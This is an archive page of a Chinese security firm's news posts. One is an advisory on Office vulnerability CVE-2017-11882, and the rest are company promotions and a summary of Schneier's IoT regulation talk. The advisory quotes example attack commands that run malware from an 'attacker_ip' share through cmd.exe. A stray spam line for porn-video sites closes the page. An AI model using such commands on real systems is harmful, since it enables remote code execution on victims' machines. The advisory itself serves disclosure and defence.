【四維創智】-專研智能,智匯安全-網絡攻防-滲透測試-web安全-無線安全-內網安全 資訊中心 – 第31頁 – 【四維創智】

                    四維資訊中心

                    關注最新行業動態,洞悉安全態勢,做行業領跑者!創造屬于我們自己的故事!

                    微軟Office曝潛伏17年之久的遠程代碼執行漏洞,可波及所有Office版本!

                    2017年11月14日,微軟發布了11月份的安全補丁更新,其中比較引人關注的莫過于在一個名為微軟公式編輯器的Office可執行文件中悄然發現了潛伏17年之久的Office遠程代碼執行漏洞(CVE-2017-11882)。該漏洞為Office內存破壞漏洞,影響目前流行的所有Office版本。攻擊者可以利用漏洞以當前登錄的用戶的身份執行任意命令。
                    漏洞信息
                    該漏洞由Embedi公司研究員發現,漏洞可導致遠程代碼執行、未授權認證繞過、無需用戶交互的遠程惡意程序植入。目前漏洞編號CVE-2017-11882,主要漏洞部件為Office中的自帶公式編輯器EQNEDT32.EXE。Microsoft公式編輯器默認安裝在Office套件中。該應用程序用于在Microsoft Word文檔中插入和編輯復雜方程作為對象鏈接和嵌入(OLE)項目。
                    Embedi的進一步分析表明,EQNEDT32.EXE是不安全的,因為執行時,它運行在Office之外,沒有受益于許多Microsoft Windows 10和Office安全特性,如Control Flow Guard。
                    Microsoft將CVE-2017-11882描述為Microsoft Office內存損壞漏洞。 “利用此漏洞需要用戶使用受影響的Microsoft Office或Microsoft WordPad軟件版本打開特制文件。在電子郵件攻擊情形中,攻擊者可以通過向用戶發送特制文件并說服用戶打開文件來利用此漏洞?!?br /> 漏洞技術分析
                    CVE-2017-11882漏洞POC樣本分析: http://www.freebuf.com/vuls/154462.html
                    可能的攻擊場景
                    Embedi研究者列舉了以下幾種該漏洞的可攻擊利用場景:當插入一些OLE(對象鏈接嵌入)實體時,可能會觸發該漏洞,實現一些惡意命令的執行,如向某個攻擊者架設網站下載執行惡意程序等。 最直接有效的漏洞利用方式就是,訪問攻擊者架設或控制的WebDAV服務器,并執行其中的運行程序。 不過,攻擊者還能利用該漏洞執行cmd.exe /c start \\attacker_ip\ff類似惡意命令,配合入侵或啟動WebClient服務。 另外,攻擊者還能使用諸如\\attacker_ip\ff\1.exe的命令向受害者系統中執行惡意程序,惡意程序的啟動機制與\\live.sysinternals.com\tools service方式類似。
                    緩解和修復措施
                    在11月的補丁修復周期中,微軟針對該漏洞修改了EQNEDT32.EXE組件的內存處理機制,并發布了多個漏洞補丁更新,強烈建議用戶及時進行下載更新。 除此之外,Embedi建議公司禁用EQNEDT32.EXE在Windows注冊表,以防止進一步利用。 研究人員寫道:“由于該組件具有許多安全問題,而且其中包含的漏洞可以被輕易利用,所以用戶確保安全的最佳選擇是禁止在Windows注冊表中注冊該組件。

                    1月 8,2018 by admin

                    捷訊 | 四維創智喜獲最高信用評級評定!忠于使命,不負信賴 !

                    2017年12月1日,四維創智榮獲得AAA級信用等級書,這無疑是對四維創智多年來一直秉承“誠信為本,技術為實,產品為真,用戶為上”的經營理念,在安全領域潛心耕耘的認可。忠于安全使命,四維創智不負信賴,經得起用戶和公眾的檢驗!
                    信用評級也稱資信評級,是由合法的獨立的專門從事信用評級的機構、運用科學嚴謹的指標體系、定量分析和定性分析相結合的方法。
                    信用等級評定是通過對企業、債券發行者、金融機構等市場參與主體的信用記錄、企業素質、經營水平、外部環境、財務狀況、發展前景以及可能出現的各種風險等進行客觀、科學、公正的分析研究之后,就其信用能力所做的綜合評價。<img src=”wp-content/uploads/2018/01/imgb4.jpg” alt=”” width=”1280″ height=”960″ class=”alignnone size-full wp-image-684″ />3A等級是評級公司給出的最高信用評級。<img src=”wp-content/uploads/2018/01/imgb5.jpg” alt=”” width=”240″ height=”286″ class=”alignnone size-full wp-image-685″ /><img src=”wp-content/uploads/2018/01/imgb6.jpg” alt=”” width=”1280″ height=”960″ class=”alignnone size-full wp-image-686″ />四維創智自2013年成立以來,在物聯網安全和企業安全運維領域深耕細作,并以此為核心業務,先后推出天象、獵鷹、獵奇等眾多安全產品,獲得包含獨立著作權和資質認證等三十余項殊榮!客戶覆蓋范圍幾近全國,涉及電力、軍工、金融等多個領域,成功為近百家大中型企業解決實際安全問題。

                    1月 8,2018 by admin

                    四維創智“城市合伙人”全國招募活動開啟!


                    網絡安全行業成就千億級紅海
                    互聯網日益成為創新驅動發展的先異力量,習近平在中央網絡安全和信息化領導小組第一次會議上講話也提出“沒有網絡安全,就沒有國家安全”的重要戰略導向。2017,伴隨著Petya病毒、永恒之藍的大規模爆發,企業安全防護成為重中之重,越來越多的企業對網絡安全的需求呈明顯增長趨勢,網絡安全日漸成為企業剛需。
                    2016年全球IT市場穩步增長至45980.0億美元,其中,安全市場增長至7356.8億美元,占IT市場16.0%。隨著企業對信息安全的重視加強,未來全球安全市場規模將不斷增大,2017年將達到9104.0億美元,同時安全市場增速也將高于IT市場的增速。
                    為什么選擇我們?
                    在安全市場需求急劇增長的大背景下,四維創智作為國內作為國內最早一批從事網絡安全的企業,秉承產品價值連接器的開放心態,通過城市平臺矩陣,以產品為核心,整合產業鏈伙伴資源,以渠道分發的形式把優質的安全產品推送給各個城市的政企單位。
                    四維創智自2013年成立以來,在物聯網和企業安全運維領域精耕細作,并以此為核心業務,先后推出天象、獵鷹、天幕等眾多安全產品及服務,涉及領域橫跨獲得包含獨立著作權和資質認證等三十余項殊榮!客戶覆蓋幾近全國,成功為電力、軍工、金融等行業,與總參某部、海軍某部、公安系統、國家電網、平安科技、國家信息技術安全研究中心等建立廣泛合作,成功為近百家大中型企業解決實際安全問題。
                    四大關鍵步驟,實現合作共贏!
                    讓“四維創智+城市合伙人”更大化的發揮自身價值,進行資源整合,借助國家政策產業升級,打造價值型企業,建立互幫互助,長期收益平臺,抱團取暖,共求發展。
                    四維創智希望為各城市合伙人提供定制化的優質服務,開放自身在技術實力、產品研發、品牌宣傳、售后支持等方面的能力,通過多樣化、嶄新的城市營銷和宣傳形式實現真正意義上的雙贏!
                    四維創智提供的支持:
                    1、四維創智產品品牌授權;
                    2、提供專業培訓與業務指導;
                    3、提供統一的市場宣傳;
                    4、提供相關產品及解決方案和售前、售后服務。
                    加入我們
                    一、城市合伙人招募區域:
                    四大直轄市,廣東,浙江,江蘇,東北三省等。
                    二、合作伙伴的條件及合作方式:
                    合作方式:
                    以地級市為單位發展獨家城市合伙人

                    合作條件:

                    1、在當地有相應政府資源和客戶資源
                    2、注冊資金高于當地一般投標要求的注冊資金
                    3、認同合作共贏,分享經濟
                    4、充分了解產品和服務
                    三、招募熱線:
                    聯系人:郭女士

                    電話:010-5602 6759

                    四維創智城市合伙人招募郵箱:guoyingying@4dogs.cn

                    12月 22,2017 by admin

                    四維創智威脅感知 中國互聯網安全大會見真章

                    四維創智(北京)科技發展有限公司經過多維度、嚴格的項目評審,實力進軍安全創客匯十強名單,并在2017年9月12日的ISC互聯網安全大會上,與決賽的其他優秀安全廠商同臺競技。
                    安全創客匯,由360互聯網安全中心主辦,更由以安全創業教父周鴻祎擔任評委會主席的評委團隊,代表著中國網絡安全行業技術創新的風向標。

                    據主辦方介紹,此次創客匯評委會從“創新性”、“應用場景和市場潛力”、“社會效應和貢獻度”以及“核心團隊的構成和能力”這四個維度對參賽企業進行打分。此次進入決賽的安全企業橫跨工控安全、金融安全、反網絡犯罪等眾多領域,中國網絡安全市場的最新動向和發展趨勢在這里可見一斑。

                    據主辦方介紹,此次創客匯評委會從“創新性”、“應用場景和市場潛力”、“社會效應和貢獻度”以及“核心團隊的構成和能力”這四個維度對參賽企業進行打分。此次進入決賽的安全企業橫跨工控安全、金融安全、反網絡犯罪等眾多領域,中國網絡安全市場的最新動向和發展趨勢在這里可見一斑。

                    四維創智CEO司紅星將會在ISC互聯網安全大會上對企業的技術優勢和發展規劃做重點解讀,同時,與資深評委進行深入的交流,希望能夠在安全前沿技術的研究上,為安全領域提供具有創新價值的技術貢獻。四維創智始終認為深耕存精技,實踐見真章!正因如此,四維創智在技術層面曾多次受到Xkon、Kcon、安全創客匯等多方資深行業專家團所青睞和肯定,這也堅定了四維創智讓網絡安全防護擲地有聲,讓安全更具價值的決心。

                    12月 22,2017 by admin

                    物聯網安全 | 我們正在建造一個和世界一樣大小的機器人

                    是時候進行物聯網安全監管了。IBM彈性系統首席技術官Bruce Schneier表示,美國政府和全球其他國家政府已經開始監管物聯網(IoT)安全。
                    Schneier在SecTor安全會議的主題演講中發表了他的觀點。他指出,今天一切基本上都是電腦,不管是汽車,手表,電話還是電視機。物聯網今天有幾個部分,包括收集數據的傳感器,計算如何處理收集到的數據的計算能力,然后是影響現實世界的執行器。
                    Schneier說:“傳感器是互聯網的眼睛和耳朵,執行器是互聯網的手腳,中間的東西就是大腦。 “我們正在創造一個感知,思考和行動的互聯網,這是一個機器人的經典定義?!盨chneier說:“我們正在建造一個和世界一樣大小的機器人,大多數人甚至都沒有意識到這一點。
                    Schneier說:“可用性和完整性威脅對于現在的生命和財產來說是非常重要的。 “所以現在漏洞的后果是非常不同的,當黑客攻擊的時候,你的數據丟失了,黑客破壞了你的車,然后你就失去了生命?!?br /> Schneier認為,在物聯網的新世界中,許多現有的安全模式都失敗了。傳統的軟件公司和像蘋果和谷歌這樣的大型移動供應商擁有專門的安全團隊,而物聯網供應商并不總是這樣。因此,Schneier表示,物聯網設備往往不能很快修補,如果有漏洞的話。Schneier說:“家用DVR(數字視頻錄像機)本來可以成為Mirai僵尸網絡的一部分,可能大多數人只要設備工作就不會在意。 “保衛未來是很困難的,因為它不僅僅是在Windows上打補丁,而是讓它消失?!?br /> 施奈爾認為,網絡安全的挑戰不能單靠行業有效解決,反而主張政府參與協助規范技術安全。隨著互聯網連接設備進入受監管行業,Schneier預計,基本上沒有監管的計算機軟件將需要改變。新技術的使用也帶來了新的政府機構和法規的歷史先例。例如,汽車,飛機,廣播電視的出現,都導致政府機構和監管機構的出現。
                    Schneier說:“在20世紀,新技術一直導致新機構的形成?!笔┠螤栄a充說,市場無法自行解決的問題很多,因為市場通常是短期的利潤動機,無法解決集體行動問題。此外,Schneier表示,企業力量需要有一個反作用力的平衡?!罢俏覀內绾谓鉀Q這樣的問題的源頭和作用力”施奈爾說。
                    Schneier預計,關于連接技術法規將會出現很多需要討論和解決的問題,但他認為,確保網絡安全的安全并不比政府法規更好。這就是說,他強調,他在SecTor發言的原因是為了提高意識,讓網絡安全專業人士參與政府政策對話。
                    Schneier說:“作為技術專家,我們需要參與政策,因為物聯網帶來巨大的潛力和巨大的風險。 “隨著互聯網安全變成一切安全,所有的安全都有強大的技術組件?!彼f:“如果決策者弄錯了技術,我們永遠不會得到正確的政策?!?/p>

                    12月 14,2017 by admin
                    国产小视频精品_国产小视频网站_国产小视频在线播放